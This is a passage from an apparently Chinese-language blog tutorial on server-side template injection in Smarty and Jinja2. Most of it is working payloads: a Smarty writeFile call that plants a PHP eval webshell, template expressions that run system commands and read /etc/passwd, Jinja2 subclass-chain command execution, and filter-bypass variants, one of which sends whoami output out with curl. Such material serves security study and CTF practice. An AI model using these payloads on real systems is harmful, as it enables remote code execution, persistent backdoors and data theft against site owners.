class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_file</span>(<span class="hljs-variable">$_filepath</span>)) &#123;<br>                @<span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-variable">$_filepath</span>);<br>            &#125;<br>            <span class="hljs-comment">// rename tmp file</span><br>            <span class="hljs-variable">$success</span> = @<span class="hljs-title function_ invoke__">rename</span>(<span class="hljs-variable">$_tmp_file</span>, <span class="hljs-variable">$_filepath</span>);<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            <span class="hljs-comment">// rename tmp file</span><br>            <span class="hljs-variable">$success</span> = @<span class="hljs-title function_ invoke__">rename</span>(<span class="hljs-variable">$_tmp_file</span>, <span class="hljs-variable">$_filepath</span>);<br>            <span class="hljs-keyword">if</span> (!<span class="hljs-variable">$success</span>) &#123;<br>                <span class="hljs-comment">// remove original file</span><br>                <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_file</span>(<span class="hljs-variable">$_filepath</span>)) &#123;<br>                    @<span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-variable">$_filepath</span>);<br>                &#125;<br>                <span class="hljs-comment">// rename tmp file</span><br>                <span class="hljs-variable">$success</span> = @<span class="hljs-title function_ invoke__">rename</span>(<span class="hljs-variable">$_tmp_file</span>, <span class="hljs-variable">$_filepath</span>);<br>            &#125;<br>        &#125;<br>        <span class="hljs-keyword">if</span> (!<span class="hljs-variable">$success</span>) &#123;<br>            <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-variable">$_error_reporting</span>);<br>            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">SmartyException</span>(<span class="hljs-string">&quot;unable to write file <span class="hljs-subst">&#123;$_filepath&#125;</span>&quot;</span>);<br>        &#125;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-variable">$smarty</span>-&gt;_file_perms !== <span class="hljs-literal">null</span>) &#123;<br>            <span class="hljs-comment">// set file permissions</span><br>            <span class="hljs-title function_ invoke__">chmod</span>(<span class="hljs-variable">$_filepath</span>, <span class="hljs-variable">$smarty</span>-&gt;_file_perms);<br>            <span class="hljs-title function_ invoke__">umask</span>(<span class="hljs-variable">$old_umask</span>);<br>        &#125;<br>        <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-variable">$_error_reporting</span>);<br><br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>可以看到 <code>writeFile</code> 函数第三个参数一个 <code>Smarty</code> 类型，后来找到了 <code>self::clearConfig()</code>，函数原型：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">clearConfig</span>(<span class="hljs-params"><span class="hljs-variable">$varname</span> = <span class="hljs-literal">null</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-title class_">Smarty_Internal_Extension_Config</span>::<span class="hljs-title function_ invoke__">clearConfig</span>(<span class="hljs-variable">$this</span>, <span class="hljs-variable">$varname</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>因此我们可以构造payload写个webshell:</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">&#123;Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,&quot;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]); <span class="hljs-meta">?&gt;</span></span><span class="language-xml">&quot;,self::clearConfig())&#125;</span><br></code></pre></td></tr></table></figure>

<hr>
<p>Smarty的SSTI用法有：</p>
<figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs dust"><span class="hljs-template-variable">&#123;$smarty.version&#125;</span><span class="language-xml">  #获取smarty的版本号</span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;php&#125;</span><span class="language-xml">phpinfo();</span><span class="hljs-template-tag">&#123;/<span class="hljs-name">php</span>&#125;</span><span class="language-xml">  #执行相应的php代码</span><br><span class="language-xml">Smarty支持使用 </span><span class="hljs-template-variable">&#123;php&#125;</span><span class="hljs-template-tag">&#123;/<span class="hljs-name">php</span>&#125;</span><span class="language-xml"> 标签来执行被包裹其中的php指令，但是在Smarty3版本中已经废弃</span><span class="hljs-template-variable">&#123;php&#125;</span><span class="language-xml">标签。</span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;self::getStreamVariable(&quot;file:///etc/passwd&quot;)&#125;</span><span class="language-xml"></span><br><span class="language-xml">在3.1.30的Smarty版本中官方已经把该静态方法删除。</span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;<span class="hljs-keyword">if</span> phpinfo()&#125;</span><span class="hljs-template-tag">&#123;/<span class="hljs-name">if</span>&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;<span class="hljs-keyword">if</span> system(&quot;id&quot;)&#125;</span><span class="hljs-template-tag">&#123;/<span class="hljs-name">if</span>&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br></code></pre></td></tr></table></figure>

<h3 id="Blade"><a href="#Blade" class="headerlink" title="Blade*"></a>Blade*</h3><p>Blade 是 Laravel 提供的一个既简单又强大的模板引擎。</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/sgm4231/p/10283661.html">laravel Blade 模板引擎 - 心之所依 - 博客园 (cnblogs.com)</a></p>
</blockquote>
<h2 id="Python中的SSTI"><a href="#Python中的SSTI" class="headerlink" title="Python中的SSTI"></a>Python中的SSTI</h2><p>python常见的模板有：</p>
<ul>
<li>Jinja2</li>
<li>tornado</li>
</ul>
<h3 id="Jinja2"><a href="#Jinja2" class="headerlink" title="Jinja2"></a>Jinja2</h3><p>Jinja2是一种面向Python的现代和设计友好的模板语言，它是以Django的模板为模型的</p>
<p>Jinja2是Flask框架的一部分。Jinja2会把模板参数提供的相应的值替换了 <code>&#123;&#123;…&#125;&#125;</code> 块</p>
<p>Jinja2使用 <code>&#123;&#123;name&#125;&#125;</code>结构表示一个变量，它是一种特殊的占位符，告诉模版引擎这个位置的值从渲染模版时使用的数据中获取。</p>
<p>由于在jinja2中是可以直接访问python的一些对象及其方法的，所以可以通过构造继承链来执行一些操作，比如文件读取，命令执行等：</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><span class="hljs-strong">__dict__</span>　　 ：保存类实例或对象实例的属性变量键值对字典<br><span class="hljs-strong">__class__</span>　　：返回一个实例所属的类<br><span class="hljs-strong">__mro__</span>　　  ：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。<br><span class="hljs-strong">__bases__</span>　　：以元组形式返回一个类直接所继承的类（可以理解为直接父类）<span class="hljs-strong">__base__</span>　　 ：和上面的bases大概相同，都是返回当前类所继承的类，即基类，区别是base返回单个，bases返回是元组<br>// <span class="hljs-strong">__base__</span>和<span class="hljs-strong">__mro__</span>都是用来寻找基类的<br><span class="hljs-strong">__subclasses__</span>　　：以列表返回类的子类<br><span class="hljs-strong">__init__</span>　　 ：类的初始化方法<br><span class="hljs-strong">__globals__</span>　　   ：对包含函数全局变量的字典的引用<span class="hljs-strong">__builtin__</span>&amp;&amp;<span class="hljs-strong">__builtins__</span>　　：python中可以直接运行一些函数，例如int()，list()等等。　　　　　　　　　　　　　　　　　　这些函数可以在<span class="hljs-strong">__builtin__</span>可以查到。查看的方法是dir(<span class="hljs-strong">__builtins__</span>)　　　　　　　　　　　　　　　　　　在py3中<span class="hljs-strong">__builtin__</span>被换成了builtin　　　　　　　　　　　　　　　　　　1.在主模块main中，<span class="hljs-strong">__builtins__</span>是对内建模块<span class="hljs-strong">__builtin__</span>本身的引用，即<span class="hljs-strong">__builtins__</span>完全等价于<span class="hljs-strong">__builtin__</span>。　　　　　　　　　　　　　　　　　　2.非主模块main中，<span class="hljs-strong">__builtins__</span>仅是对<span class="hljs-strong">__builtin__</span>.<span class="hljs-strong">__dict__</span>的引用，而非<span class="hljs-strong">__builtin__</span>本身<br><br></code></pre></td></tr></table></figure>

<p>用__globals__更深入的去看每个类可以调用的东西（包括模块，类，变量等等），如果有os这种可以直接传入命令，造成命令执行：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#coding:utf-8</span><br>search = <span class="hljs-string">&#x27;os&#x27;</span>   <span class="hljs-comment">#也可以是其他你想利用的模块</span><br>num = -<span class="hljs-number">1</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> ().__class__.__bases__[<span class="hljs-number">0</span>].__subclasses__():<br>    num += <span class="hljs-number">1</span><br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-keyword">if</span> search <span class="hljs-keyword">in</span> i.__init__.__globals__.keys():<br>            <span class="hljs-built_in">print</span>(i, num)<br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">pass</span> <br></code></pre></td></tr></table></figure>

<p>&#x3D;&#x3D;<strong>只能在python2版本使用</strong>&#x3D;&#x3D;</p>
<p><img src="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200903164854386-1155449135.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以看到在元组68，73的位置找到了os方法，这样就可以构造命令执行payload:</p>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sqf">().<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__bases__</span>[<span class="hljs-number">0</span>].<span class="hljs-variable">__subclasses__</span>()[<span class="hljs-number">68</span>].<span class="hljs-variable">__init__</span>.<span class="hljs-variable">__globals__</span>[<span class="hljs-string">&#x27;os&#x27;</span>].system(<span class="hljs-string">&#x27;whoami&#x27;</span>)<br>().<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__base__</span>.<span class="hljs-variable">__subclasses__</span>()[<span class="hljs-number">73</span>].<span class="hljs-variable">__init__</span>.<span class="hljs-variable">__globals__</span>[<span class="hljs-string">&#x27;os&#x27;</span>].system(<span class="hljs-string">&#x27;whoami&#x27;</span>)<br>().<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__mro__</span>[<span class="hljs-number">1</span>].<span class="hljs-variable">__subclasses__</span>()[<span class="hljs-number">68</span>].<span class="hljs-variable">__init__</span>.<span class="hljs-variable">__globals__</span>[<span class="hljs-string">&#x27;os&#x27;</span>].system(<span class="hljs-string">&#x27;whoami&#x27;</span>)<br>().<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__mro__</span>[<span class="hljs-number">1</span>].<span class="hljs-variable">__subclasses__</span>()[<span class="hljs-number">73</span>].<span class="hljs-variable">__init__</span>.<span class="hljs-variable">__globals__</span>[<span class="hljs-string">&#x27;os&#x27;</span>].system(<span class="hljs-string">&#x27;whoami&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p><img src="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200903185803928-864364882.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以使用<code>__builtins__</code>，python2和python3版本都可用：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#coding:utf-8</span><br><br>search = <span class="hljs-string">&#x27;__builtins__&#x27;</span><br>num = -<span class="hljs-number">1</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> ().__class__.__bases__[<span class="hljs-number">0</span>].__subclasses__():<br>    num += <span class="hljs-number">1</span><br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-comment"># print(i.__init__.__globals__.keys())</span><br>        <span class="hljs-keyword">if</span> search <span class="hljs-keyword">in</span> i.__init__.__globals__.keys():<br>            <span class="hljs-built_in">print</span>(i, num)<br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<p><img src="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/image-20230214221609361.png" srcset="/img/loading.gif" lazyload alt="image-20230214221609361"></p>
<p>这样可以执行命令：</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">()<span class="hljs-selector-class">.__class__</span><span class="hljs-selector-class">.__bases__</span><span class="hljs-selector-attr">[0]</span><span class="hljs-selector-class">.__subclasses__</span>()<span class="hljs-selector-attr">[128]</span><span class="hljs-selector-class">.__init__</span><span class="hljs-selector-class">.__globals__</span><span class="hljs-selector-attr">[<span class="hljs-string">&#x27;__builtins__&#x27;</span>]</span><span class="hljs-selector-attr">[<span class="hljs-string">&#x27;eval&#x27;</span>]</span>(&quot;__import__(&#x27;os&#x27;)<span class="hljs-selector-class">.system</span>(&#x27;whoami&#x27;)&quot;)<br></code></pre></td></tr></table></figure>

<p><img src="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/image-20230214221644950.png" srcset="/img/loading.gif" lazyload alt="image-20230214221644950"></p>
<hr>
<p>一些payload：</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs markdown">获得基类<br><span class="hljs-section">#python2.7</span><br>&#x27;&#x27;.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__mro__</span>[2]<br>&#123;&#125;.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0]<br>().<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0]<br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0]<br>request.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__mro__</span>[1]<br><span class="hljs-section">#python3.7</span><br>&#x27;&#x27;.<span class="hljs-strong">__。。。class__</span>.<span class="hljs-strong">__mro__</span>[1]<br>&#123;&#125;.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0]<br>().<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0]<br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0]<br>request.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__mro__</span>[1]<br><br><span class="hljs-section">#python 2.7</span><br><span class="hljs-section">#文件操作</span><br><span class="hljs-section">#找到file类</span><br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0].<span class="hljs-strong">__subclasses__</span>()[40]<br><span class="hljs-section">#读文件</span><br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[<span class="hljs-string">0</span>].<span class="hljs-strong">__subclasses__</span>()[<span class="hljs-string">40</span>](<span class="hljs-link">&#x27;/etc/passwd&#x27;</span>).read()<br><span class="hljs-section">#写文件</span><br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[<span class="hljs-string">0</span>].<span class="hljs-strong">__subclasses__</span>()[<span class="hljs-string">40</span>](<span class="hljs-link">&#x27;/tmp&#x27;</span>).write(&#x27;test&#x27;)<br><br><span class="hljs-section">#命令执行</span><br><span class="hljs-section">#os执行</span><br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0].<span class="hljs-strong">__subclasses__</span>()[59].<span class="hljs-strong">__init__</span>.func<span class="hljs-emphasis">_globals.linecache下有os类，可以直接执行命令：</span><br><span class="hljs-emphasis">[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0].<span class="hljs-strong">__subclasses__</span>()[59].<span class="hljs-strong">__init__</span>.func_</span>globals.linecache.os.popen(&#x27;id&#x27;).read()<br><span class="hljs-section">#eval,impoer等全局函数</span><br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0].<span class="hljs-strong">__subclasses__</span>()[59].<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>.<span class="hljs-strong">__builtins__</span>下有eval，<span class="hljs-strong">__import__</span>等的全局函数，可以利用此来执行命令：<br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[<span class="hljs-string">0</span>].<span class="hljs-strong">__subclasses__</span>()[<span class="hljs-string">59</span>].<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-symbol">&#x27;eval&#x27;</span>](&quot;<span class="hljs-strong">__import__</span>(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;)<br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0].<span class="hljs-strong">__subclasses__</span>()[59].<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>.<span class="hljs-strong">__builtins__</span>.eval(&quot;<span class="hljs-strong">__import__</span>(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;)<br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[0].<span class="hljs-strong">__subclasses__</span>()[59].<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>.<span class="hljs-strong">__builtins__</span>.<span class="hljs-strong">__import__</span>(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()<br>[].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[<span class="hljs-string">0</span>].<span class="hljs-strong">__subclasses__</span>()[<span class="hljs-string">59</span>].<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-symbol">&#x27;__import__&#x27;</span>](&#x27;os&#x27;).popen(&#x27;id&#x27;).read()<br><br><span class="hljs-section">#python3.7</span><br><span class="hljs-section">#命令执行</span><br>&#123;% for c in [].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__base__</span>.<span class="hljs-strong">__subclasses__</span>() %&#125;&#123;% if c.<span class="hljs-strong">__name__</span>==&#x27;catch<span class="hljs-emphasis">_warnings&#x27; %&#125;&#123;&#123; c.<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[&#x27;<span class="hljs-strong">__builtins__</span>&#x27;].eval(&quot;<span class="hljs-strong">__import__</span>(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;) &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br><span class="hljs-emphasis">#文件操作</span><br><span class="hljs-emphasis">&#123;% for c in [].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__base__</span>.<span class="hljs-strong">__subclasses__</span>() %&#125;&#123;% if c.<span class="hljs-strong">__name__</span>==&#x27;catch_</span>warnings&#x27; %&#125;&#123;&#123; c.<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[&#x27;<span class="hljs-strong">__builtins__</span>&#x27;].open(&#x27;filename&#x27;, &#x27;r&#x27;).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;<br><span class="hljs-section">#windows下的os命令</span><br>&quot;&quot;.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[<span class="hljs-string">0</span>].<span class="hljs-strong">__subclasses__</span>()[<span class="hljs-string">118</span>].<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-link">&#x27;dir&#x27;</span>).read()<br><br></code></pre></td></tr></table></figure>

<p>绕waf的姿势：</p>
<p><strong>过滤[</strong></p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs stylus">#getitem、pop<br><span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__.<span class="hljs-built_in">__getitem__</span>(<span class="hljs-number">2</span>).<span class="hljs-built_in">__subclasses__</span>()<span class="hljs-selector-class">.pop</span>(<span class="hljs-number">40</span>)(<span class="hljs-string">&#x27;/etc/passwd&#x27;</span>)<span class="hljs-selector-class">.read</span>()<br><span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__.<span class="hljs-built_in">__getitem__</span>(<span class="hljs-number">2</span>).<span class="hljs-built_in">__subclasses__</span>()<span class="hljs-selector-class">.pop</span>(<span class="hljs-number">59</span>).__init__<span class="hljs-selector-class">.func_globals</span><span class="hljs-selector-class">.linecache</span><span class="hljs-selector-class">.os</span><span class="hljs-selector-class">.popen</span>(<span class="hljs-string">&#x27;ls&#x27;</span>)<span class="hljs-selector-class">.read</span>()<br><br></code></pre></td></tr></table></figure>

<p><strong>过滤引号</strong></p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="language-xml">#chr函数</span><br><span class="language-xml">&#123;% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %&#125;</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__.__getitem__</span>(<span class="hljs-name">0</span>).__subclasses__().pop(<span class="hljs-name">40</span>)(<span class="hljs-name">chr</span>(<span class="hljs-name">47</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">101</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">116</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">99</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">47</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">112</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">97</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">115</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">115</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">119</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">100</span>)).read()&#125;&#125;</span><span class="language-xml">#request对象</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__.__getitem__</span>(<span class="hljs-name">0</span>).__subclasses__().pop(<span class="hljs-name">40</span>)(<span class="hljs-name">request.args.path</span>).read() &#125;&#125;</span><span class="language-xml">&amp;path=/etc/passwd</span><br><span class="language-xml">#命令执行</span><br><span class="language-xml">&#123;% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %&#125;</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__.__getitem__</span>(<span class="hljs-name">0</span>).__subclasses__().pop(<span class="hljs-name">59</span>).__init__.func_globals.linecache.os.popen(<span class="hljs-name">chr</span>(<span class="hljs-name">105</span>)%<span class="hljs-number">2</span>bchr(<span class="hljs-name">100</span>)).read() &#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__.__getitem__</span>(<span class="hljs-name">0</span>).__subclasses__().pop(<span class="hljs-name">59</span>).__init__.func_globals.linecache.os.popen(<span class="hljs-name">request.args.cmd</span>).read() &#125;&#125;</span><span class="language-xml">&amp;cmd=id</span><br><span class="language-xml"></span><br></code></pre></td></tr></table></figure>

<p><strong>滤下划线</strong></p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">&#x27;&#x27;</span>[request.args.class][request.args.mro][2][request.args.subclasses]()[40](<span class="hljs-name">&#x27;/etc/passwd&#x27;</span>).read() &#125;&#125;</span><span class="language-xml">&amp;class=__class__&amp;mro=__mro__&amp;subclasses=__subclasses__</span><br><span class="language-xml"></span><br></code></pre></td></tr></table></figure>

<p><strong>过滤花括号</strong></p>
<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="language-xml">#用&#123;%%&#125;标记</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">if</span> <span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[<span class="hljs-number">2</span>].__subclasses__()[<span class="hljs-number">59</span>].__init__.func_globals.linecache.os.popen(<span class="hljs-string">&#x27;curl http://127.0.0.1:7999/?i=`whoami`&#x27;</span>).read()==<span class="hljs-string">&#x27;p&#x27;</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml">1</span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">endif</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br></code></pre></td></tr></table></figure>

<p><strong>利用示例：</strong></p>
<figure class="highlight django"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs django"><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">for</span></span> c <span class="hljs-keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">if</span></span> c.__name__ == &#x27;catch_warnings&#x27; %&#125;</span><span class="language-xml"></span><br><span class="language-xml">  </span><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">for</span></span> b <span class="hljs-keyword">in</span> c.__init__.__globals__.values() %&#125;</span><span class="language-xml"></span><br><span class="language-xml">  </span><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">if</span></span> b.__class__ == &#123;&#125;.__class__ %&#125;</span><span class="language-xml"></span><br><span class="language-xml">    </span><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">if</span></span> &#x27;eval&#x27; <span class="hljs-keyword">in</span> b.keys() %&#125;</span><span class="language-xml"></span><br><span class="language-xml">      </span><span class="hljs-template-variable">&#123;&#123; b[&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;id&quot;).read()&#x27;) &#125;&#125;</span><span class="language-xml">         //popen的参数就是要执行的命令</span><br><span class="language-xml">    </span><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">endif</span></span> %&#125;</span><span class="language-xml"></span><br><span class="language-xml">  </span><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">endif</span></span> %&#125;</span><span class="language-xml"></span><br><span class="language-xml">  </span><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">endfor</span></span> %&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">endif</span></span> %&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;% <span class="hljs-name"><span class="hljs-name">endfor</span></span> %&#125;</span><br></code></pre></td></tr></table></figure>

<blockquote>
